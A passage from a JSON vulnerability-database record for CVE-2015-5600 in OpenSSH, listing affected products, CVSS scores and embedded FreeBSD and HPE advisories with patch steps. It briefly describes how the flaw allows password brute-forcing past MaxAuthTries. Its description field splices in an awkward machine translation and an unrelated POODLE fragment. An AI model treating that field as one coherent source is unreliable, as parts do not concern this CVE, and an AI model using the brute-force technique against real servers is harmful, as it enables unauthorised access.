"scope": "eq",
"trust": 1.1,
"vendor": "oracle",
"version": "3.2"
},
{
"model": "integrated lights out manager",
"scope": "eq",
"trust": 1.1,
"vendor": "oracle",
"version": "3.1"
},
{
"model": "integrated lights out manager",
"scope": "eq",
"trust": 1.1,
"vendor": "oracle",
"version": "3.0"
},
{
"model": "mac os x",
"scope": "eq",
"trust": 0.8,
"vendor": "apple",
"version": "10.10 to 10.10.4"
},
{
"model": "big-ip",
"scope": "eq",
"trust": 0.8,
"vendor": "hitachi",
"version": "1500"
},
{
"model": "openssh",
"scope": "eq",
"trust": 0.6,
"vendor": "openbsd",
"version": "6.9"
},
{
"model": "linux",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "15.04"
},
{
"model": "linux lts",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "14.04"
},
{
"model": "linux lts i386",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "12.04"
},
{
"model": "linux lts amd64",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "12.04"
},
{
"model": "enterprise linux workstation optional",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "6"
},
{
"model": "enterprise linux workstation",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "6"
},
{
"model": "enterprise linux server optional",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "6"
},
{
"model": "enterprise linux server",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "6"
},
{
"model": "enterprise linux hpc node optional",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "6"
},
{
"model": "enterprise linux hpc node",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "6"
},
{
"model": "enterprise linux desktop optional",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "6"
},
{
"model": "enterprise linux desktop",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "6"
},
{
"model": "vm server for",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "x863.4"
},
{
"model": "vm server for",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "x863.3"
},
{
"model": "vm server for",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "x863.2"
},
{
"model": "linux",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "0"
},
{
"model": "enterprise linux",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "7"
},
{
"model": "enterprise linux",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "6.2"
},
{
"model": "enterprise linux",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "6"
},
{
"model": "enterprise linux",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5"
},
{
"model": "6.9p1",
"scope": null,
"trust": 0.3,
"vendor": "openssh",
"version": null
},
{
"model": "web gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "7.4.13"
},
{
"model": "web gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "7.3.28"
},
{
"model": "web gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "7.4.2.1"
},
{
"model": "web gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "7.4.2"
},
{
"model": "web gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "7.4.1"
},
{
"model": "web gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "7.4.0"
},
{
"model": "web gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "7.3.2.9."
},
{
"model": "web gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "7.3.2.9"
},
{
"model": "web gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "7.3.2.6"
},
{
"model": "web gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "7.3.2.4"
},
{
"model": "web gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "7.3.2.2"
},
{
"model": "web gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "7.3.2.10"
},
{
"model": "web gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "7.3.2"
},
{
"model": "web gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "7.2.0.9"
},
{
"model": "web gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "7.1.5.2"
},
{
"model": "web gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "7.1.5.1"
},
{
"model": "web gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "7.0.0"
},
{
"model": "nsmexpress",
"scope": "eq",
"trust": 0.3,
"vendor": "juniper",
"version": null
},
{
"model": "nsm4000",
"scope": "eq",
"trust": 0.3,
"vendor": "juniper",
"version": "0"
},
{
"model": "nsm3000",
"scope": "eq",
"trust": 0.3,
"vendor": "juniper",
"version": null
},
{
"model": "security network protection",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.3.2"
},
{
"model": "security network protection",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.3.1"
},
{
"model": "security network protection",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.2.0"
},
{
"model": "qlogic virtual fabric extension module for ibm bladecenter",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "9.0"
},
{
"model": "qlogic 8gb intelligent pass-thru module and san switch module",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.10"
},
{
"model": "proventia network enterprise scanner",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.3"
},
{
"model": "flex system fc43171 8gb san switch and san pass-thru",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "9.1"
},
{
"model": "bladecenter advanced management module 3.66n",
"scope": null,
"trust": 0.3,
"vendor": "ibm",
"version": null
},
{
"model": "vcx",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "9.8.17"
},
{
"model": "bladesystem c-class virtual connect",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "4.45"
},
{
"model": "bladesystem c-class virtual connect",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "4.30"
},
{
"model": "bladesystem c-class virtual connect",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "4.21"
},
{
"model": "bladesystem c-class virtual connect",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "3.62"
},
{
"model": "3par os",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "3.1.3"
},
{
"model": "linux",
"scope": null,
"trust": 0.3,
"vendor": "gentoo",
"version": null
},
{
"model": "9.3-stable",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "9.3-release-p9",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "9.3-release-p6",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "9.3-release-p5",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "9.3-release-p3",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "9.3-release-p2",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "9.3-release-p13",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "9.3-release-p10",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "9.3-release-p1",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "8.4-release-p9",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "8.4-release-p8",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "8.4-release-p7",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "8.4-release-p4",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "8.4-release-p27",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "8.4-release-p24",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "8.4-release-p23",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "8.4-release-p20",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "8.4-release-p19",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "8.4-release-p17",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "8.4-release-p16",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "8.4-release-p15",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "8.4-release-p14",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "8.4-release-p13",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "8.4-release-p12",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "8.4-release-p11",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "freebsd",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "8.4"
},
{
"model": "freebsd",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "10.2"
},
{
"model": "10.1-release-p9",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "10.1-release-p6",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "10.1-release-p5",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "10.1-release-p1",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "big-ip gv0lb151-20nnnn1",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "150010.0.1"
},
{
"model": "big-ip gv0lb151-20nnnn1",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "15009.3.1"
},
{
"model": "big-ip gv0lb151-20nnnn1",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "15009.1.3"
},
{
"model": "big-ip gv0lb151-10nnnn1",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "150010.0.1"
},
{
"model": "big-ip gv0lb151-10nnnn1",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "15009.3.1"
},
{
"model": "big-ip gv0lb151-10nnnn1",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "15009.1.3"
},
{
"model": "big-ip gv0lb150-20nnnn0",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "150010.0.1"
},
{
"model": "big-ip gv0lb150-20nnnn0",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "15009.3.1"
},
{
"model": "big-ip gv0lb150-20nnnn0",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "15009.1.3"
},
{
"model": "big-ip gv0lb150-10nnnn0",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "150010.0.1"
},
{
"model": "big-ip gv0lb150-10nnnn0",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "15009.3.1"
},
{
"model": "big-ip gv0lb150-10nnnn0",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "15009.1.3"
},
{
"model": "centos",
"scope": "eq",
"trust": 0.3,
"vendor": "centos",
"version": "7"
},
{
"model": "centos",
"scope": "eq",
"trust": 0.3,
"vendor": "centos",
"version": "6"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.10.4"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.10.3"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.10.2"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.10.1"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.10"
},
{
"model": "qlogic virtual fabric extension module for ibm bladecenter",
"scope": "ne",
"trust": 0.3,
"vendor": "ibm",
"version": "9.0.3.14.0"
},
{
"model": "qlogic 8gb intelligent pass-thru module and san switch module",
"scope": "ne",
"trust": 0.3,
"vendor": "ibm",
"version": "7.10.1.37.00"
},
{
"model": "flex system fc43171 8gb san switch and san pass-thru",
"scope": "ne",
"trust": 0.3,
"vendor": "ibm",
"version": "9.1.7.01.00"
},
{
"model": "bladecenter advanced management module 3.66p",
"scope": "ne",
"trust": 0.3,
"vendor": "ibm",
"version": null
},
{
"model": "vcx",
"scope": "ne",
"trust": 0.3,
"vendor": "hp",
"version": "9.8.18"
},
{
"model": "bladesystem c-class virtual connect",
"scope": "ne",
"trust": 0.3,
"vendor": "hp",
"version": "4.50"
},
{
"model": "3par os mu2",
"scope": "ne",
"trust": 0.3,
"vendor": "hp",
"version": "3.2.2"
},
{
"model": "3par os mu5",
"scope": "ne",
"trust": 0.3,
"vendor": "hp",
"version": "3.2.1"
},
{
"model": "mac os",
"scope": "ne",
"trust": 0.3,
"vendor": "apple",
"version": "x10.10.5"
}
],
"sources": [
{
"db": "BID",
"id": "75990"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-003969"
},
{
"db": "CNNVD",
"id": "CNNVD-201508-001"
},
{
"db": "NVD",
"id": "CVE-2015-5600"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:openbsd:openssh:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "6.9",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2015-5600"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "king cope",
"sources": [
{
"db": "BID",
"id": "75990"
}
],
"trust": 0.3
},
"cve": "CVE-2015-5600",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 8.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 7.8,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 8.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2015-5600",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:C",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2015-5600",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201508-001",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2015-5600",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2015-5600"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-003969"
},
{
"db": "CNNVD",
"id": "CNNVD-201508-001"
},
{
"db": "NVD",
"id": "CVE-2015-5600"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The kbdint_next_device function in auth2-chall.c in sshd in OpenSSH through 6.9 does not properly restrict the processing of keyboard-interactive devices within a single connection, which makes it easier for remote attackers to conduct brute-force attacks or cause a denial of service (CPU consumption) via a long and duplicative list in the ssh -oKbdInteractiveDevices option, as demonstrated by a modified client that provides a different password for each pam element on this list. Openssh of sshd of auth2-chall.c Inside kbdint_next_device The function is a keyboard interaction within a single connection (keyboard-interactive) The brute force is not adequately restricted for device processing. (brute-force) Attacks or service disruption (CPU Resource consumption ) There are vulnerabilities that are put into a state.By a third party ssh of -oKbdInteractiveDevices Brute force through an overly long and redundant list of options (brute-force) Attacks or service disruption (CPU Resource consumption ) There is a possibility of being put into a state. OpenSSH is prone to a security-bypass weakness. \nAn attacker can exploit this issue to bypass certain security restrictions and perform unauthorized actions. This may lead to further attacks. These vulnerabilities\ninclude:\n\nThe SSLv3 vulnerability known as \"Padding Oracle on Downgraded Legacy\nEncryption\" also known as \"POODLE\", which could be exploited remotely\nresulting in disclosure of information. \nThe following firmware versions of Virtual Connect (VC) are impacted:\n\nHPE BladeSystem c-Class Virtual Connect (VC) Firmware 4.30 through VC 4.45\nHPE BladeSystem c-Class Virtual Connect (VC) Firmware 3.62 through VC 4.21\n\nNote: Firmware versions 3.62 through 4.21 are not impacted by CVE-2016-0800,\nCVE-2015-3194, CVE-2014-3566, CVE-2015-0705, CVE-2016-0799, and\nCVE-2016-2842. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA512\n\n=============================================================================\nFreeBSD-SA-15:16.openssh Security Advisory\n The FreeBSD Project\n\nTopic: OpenSSH multiple vulnerabilities\n\nCategory: contrib\nModule: openssh\nAnnounced: 2015-07-28, revised on 2015-07-30\nAffects: All supported versions of FreeBSD. \nCorrected: 2015-07-28 19:58:44 UTC (stable/10, 10.2-PRERELEASE)\n 2015-07-28 19:58:44 UTC (stable/10, 10.2-BETA2-p2)\n 2015-07-28 19:59:04 UTC (releng/10.2, 10.2-RC1-p1)\n 2015-07-28 19:59:11 UTC (releng/10.1, 10.1-RELEASE-p16)\n 2015-07-28 19:58:54 UTC (stable/9, 9.3-STABLE)\n 2015-07-28 19:59:22 UTC (releng/9.3, 9.3-RELEASE-p21)\n 2015-07-30 10:09:07 UTC (stable/8, 8.4-STABLE)\n 2015-07-30 10:09:31 UTC (releng/8.4, 8.4-RELEASE-p36)\nCVE Name: CVE-2014-2653, CVE-2015-5600\n\nFor general information regarding FreeBSD Security Advisories,\nincluding descriptions of the fields above, security branches, and the\nfollowing sections, please visit \u003cURL:https://security.FreeBSD.org/\u003e. \n\n0. Revision history\n\nv1.0 2015-02-25 Initial release. \nv1.1 2015-07-30 Revised patch for FreeBSD 8.x to address regression when\n keyboard interactive authentication is used. \n\nI. Background\n\nOpenSSH is an implementation of the SSH protocol suite, providing an\nencrypted and authenticated transport for a variety of services,\nincluding remote shell access. \n\nThe security of the SSH connection relies on the server authenticating\nitself to the client as well as the user authenticating itself to the\nserver. SSH servers uses host keys to verify their identity. \n\nRFC 4255 has defined a method of verifying SSH host keys using Domain\nName System Security (DNSSEC), by publishing the key fingerprint using\nDNS with \"SSHFP\" resource record. RFC 6187 has defined methods to use\na signature by a trusted certification authority to bind a given public\nkey to a given digital identity with X.509v3 certificates. \n\nThe PAM (Pluggable Authentication Modules) library provides a flexible\nframework for user authentication and session setup / teardown. \n\nOpenSSH uses PAM for password authentication by default. \n\nII. Problem Description\n\nOpenSSH clients does not correctly verify DNS SSHFP records when a server\noffers a certificate. [CVE-2014-2653]\n\nOpenSSH servers which are configured to allow password authentication\nusing PAM (default) would allow many password attempts. \n\nIII. Impact\n\nA malicious server may be able to force a connecting client to skip DNS\nSSHFP record check and require the user to perform manual host verification\nof the host key fingerprint. This could allow man-in-the-middle attack\nif the user does not carefully check the fingerprint. [CVE-2014-2653]\n\nA remote attacker may effectively bypass MaxAuthTries settings, which would\nenable them to brute force passwords. [CVE-2015-5600]\n\nIV. Workaround\n\nSystems that do not use OpenSSH are not affected. \n\nThere is no workaround for CVE-2014-2653, but the problem only affects\nnetworks where DNSsec and SSHFP is properly configured. Users who uses\nSSH should always check server host key fingerprints carefully when\nprompted. \n\nSystem administrators can set:\n\n\tUsePAM no\n\nIn their /etc/ssh/sshd_config and restart sshd service to workaround the\nproblem described as CVE-2015-5600 at expense of losing features provided\nby the PAM framework. \n\nWe recommend system administrators to disable password based authentication\ncompletely, and use key based authentication exclusively in their SSH server\nconfiguration, when possible. This would eliminate the possibility of being\never exposed to password brute force attack. \n\nV. Solution\n\nPerform one of the following:\n\n1) Upgrade your vulnerable system to a supported FreeBSD stable or\nrelease / security branch (releng) dated after the correction date. \n\nSSH service has to be restarted after the update. A reboot is recommended\nbut not required. \n\n2) To update your vulnerable system via a binary patch:\n\nSystems running a RELEASE version of FreeBSD on the i386 or amd64\nplatforms can be updated via the freebsd-update(8) utility:\n\n# freebsd-update fetch\n# freebsd-update install\n\nSSH service has to be restarted after the update. A reboot is recommended\nbut not required. \n\n3) To update your vulnerable system via a source code patch:\n\nThe following patches have been verified to apply to the applicable\nFreeBSD release branches. \n\na) Download the relevant patch from the location below, and verify the\ndetached PGP signature using your PGP utility. \n\n[FreeBSD 9.3, 10.1, 10.2]\n# fetch https://security.FreeBSD.org/patches/SA-15:16/openssh.patch\n# fetch https://security.FreeBSD.org/patches/SA-15:16/openssh.patch.asc\n# gpg --verify openssh.patch.asc\n\n[FreeBSD 8.4]\n# fetch https://security.FreeBSD.org/patches/SA-15:16/openssh-8.patch\n# fetch https://security.FreeBSD.org/patches/SA-15:16/openssh-8.patch.asc\n# gpg --verify openssh-8.patch.asc\n\n# fetch https://security.FreeBSD.org/patches/SA-15:16/openssh-8-errata.patc\n# fetch https://security.FreeBSD.org/patches/SA-15:16/openssh-8-errata.patch.asc\n# gpg --verify openssh-8-errata.patch.asc\n\nb) Apply the patch. Execute the following commands as root:\n\n# cd /usr/src\n# patch \u003c /path/to/patch\n\nc) Recompile the operating system using buildworld and installworld as\ndescribed in \u003cURL:https://www.FreeBSD.org/handbook/makeworld.html\u003e. \n\nRestart the SSH service, or reboot the system. \n\nVI. Correction details\n\nThe following list contains the correction revision numbers for each\naffected branch. \n\nBranch/path Revision\n- -------------------------------------------------------------------------\nstable/8/ r286067\nreleng/8.4/ r286068\nstable/9/ r285977\nreleng/9.3/ r285980\nstable/10/ r285976\nreleng/10.1/ r285979\nreleng/10.2/ r285978\n- -------------------------------------------------------------------------\n\nTo see which files were modified by a particular revision, run the\nfollowing command, replacing NNNNNN with the revision number, on a\nmachine with Subversion installed:\n\n# svn diff -cNNNNNN --summarize svn://svn.freebsd.org/base\n\nOr visit the following URL, replacing NNNNNN with the revision number:\n\n\u003cURL:https://svnweb.freebsd.org/base?view=revision\u0026revision=NNNNNN\u003e\n\nVII. References\n\n\u003cURL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2653\u003e\n\n\u003cURL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5600\u003e\n\nThe latest revision of this advisory is available at\n\u003cURL:https://security.FreeBSD.org/advisories/FreeBSD-SA-15:16.openssh.asc\u003e\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v2.1.6 (FreeBSD)\n\niQIcBAEBCgAGBQJVufuCAAoJEO1n7NZdz2rnHHAQALfjXH/WyrgpHxw1YFipwFSD\nbl+HLbdvMVbfBxLV7eVBK9RPQiyoxwocmU0uMdiNEIWt2llczTLEl/wtUjj6f4Ko\nK6E7AAOgOX4zdQxBd2502FvXC1oNbDEvK8X3M4MzPHAG4QRgXNffRGYvClmbayck\n2i+bjcHdKAEwFJjHk4wXOQ0yhdF6Q36bH0N3kPV9z7sAt3tuzSWhvtX6QQSyeuCJ\nie2db9CdSUnFhYELJnVMpVTf3ppMqUT6QEe45LmsGA6F8yWdMaW2vtMdJq6xFVYP\nINCUVyOlDRu0TibjLUpXu4KugeDgyTXy9oz4SRdnpcUWz33fM6aSgOkpiM1h05ja\nBJrs0HZbkjCwtD+8a0buoyIKb9NBIsDKbrec5g8AEDkAHjRzraLGAXUYwkFeyqYJ\nj+ll5r5iu5fc4s8QM+ySlGCW8V9Ix8FX7Rr7FhAWLSKEldDsnCRjG4EfrAcd1HiC\nPleAnLv4uKwfSugIBIEs5ls7+TzWytW8nnEpMEerXUD894suFIycOT6eoUYF/CCT\nI1nHWSITw4HSj8+wBvrhxwZCRqIMOAZB+3jzrwRE+QZkghoWnPnqrCn9uLkdndq5\newgz6PiuYC8Zx0Z6trA72oV+XjTKu2d6eO5tRpe9aAmhPmfBWg3fXYltVzTzF9IE\nr0z98qmTEPiTDi8dr+K/\n=GsXJ\n-----END PGP SIGNATURE-----\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nNote: the current version of the following document is available here:\nhttps://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_n\na-c05128992\n\nSUPPORT COMMUNICATION - SECURITY BULLETIN\n\nDocument ID: c05128992\nVersion: 1\n\nHPSBST03599 rev.1 - HPE 3PAR OS running OpenSSH, Remote Denial of Service\n(DoS), Access Restriction Bypass\n\nNOTICE: The information in this Security Bulletin should be acted upon as\nsoon as possible. \n\nRelease Date: 2016-05-11\nLast Updated: 2016-05-11\n\nPotential Security Impact: Remote Access Restriction Bypass, Denial of\nService (DoS)\n\nSource: Hewlett Packard Enterprise, Product Security Response Team\n\nVULNERABILITY SUMMARY\nA vulnerability in OpenSSH has been addressed by HPE 3PAR OS. The vulnerabily\ncould be exploited remotely resulting in Denial of Service (DoS) or access\nrestriction bypass. \n\nReferences:\n\n - CVE-2015-5600\n - PSRT110106\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \nHPE 3PAR OS versions 3.1.3 and later, prior to 3.2.1 MU5 and 3.2.2 MU2\nrunning OpenSSH\n\nBACKGROUND\n\nCVSS 2.0 Base Metrics\n===========================================================\n Reference Base Vector Base Score\nCVE-2015-5600 (AV:N/AC:L/Au:N/C:P/I:N/A:C) 8.5\n===========================================================\n Information on CVSS is documented\n in HP Customer Notice: HPSN-2008-002\n\nRESOLUTION\n\nHPE has provided the following software updates and mitigation information to\nresolve the vulnerability in 3PAR OS running OpenSSH. \n\n+ 3PAR OS 3.2.1 MU5 and 3.2.2 MU2\n\n - HPE recommends prior impacted versions update to 3PAR OS 3.2.1 MU5 or\n3.2.2 MU2. \n\n+ 3PAR OS 3.1.3 is also vulnerable but will not be fixed. \n\n **Mitigation:** The best protection to guard against exploitation of this\nvulnerability is to securely configure and operate the storage array in\naccordance with the *HPE 3PAR Configuration Guidelines* documentation. Please\ncontact HPE Technical Support for assistance. \n\nHISTORY\nVersion:1 (rev.1) - 11 May 2016 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running Hewlett Packard Enterprise (HPE) software\nproducts should be applied in accordance with the customer\u0027s patch management\npolicy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HPE Services support channel. For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hpe.com. \n\nReport: To report a potential security vulnerability with any HPE supported\nproduct, send Email to: security-alert@hpe.com\n\nSubscribe: To initiate a subscription to receive future HPE Security Bulletin\nalerts via Email: http://www.hpe.com/support/Subscriber_Choice\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here: http://www.hpe.com/support/Security_Bulletin_Archive\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HPE General Software\nHF = HPE Hardware and Firmware\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPV = ProCurve\nST = Storage Software\nUX = HP-UX\n\nCopyright 2016 Hewlett Packard Enterprise\n\nHewlett Packard Enterprise shall not be liable for technical or editorial\nerrors or omissions contained herein. The information provided is provided\n\"as is\" without warranty of any kind. To the extent permitted by law, neither\nHP or its affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits; damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. Hewlett\nPackard Enterprise and the names of Hewlett Packard Enterprise products\nreferenced herein are trademarks of Hewlett Packard Enterprise in the United\nStates and other countries. Other product and company names mentioned herein\nmay be trademarks of their 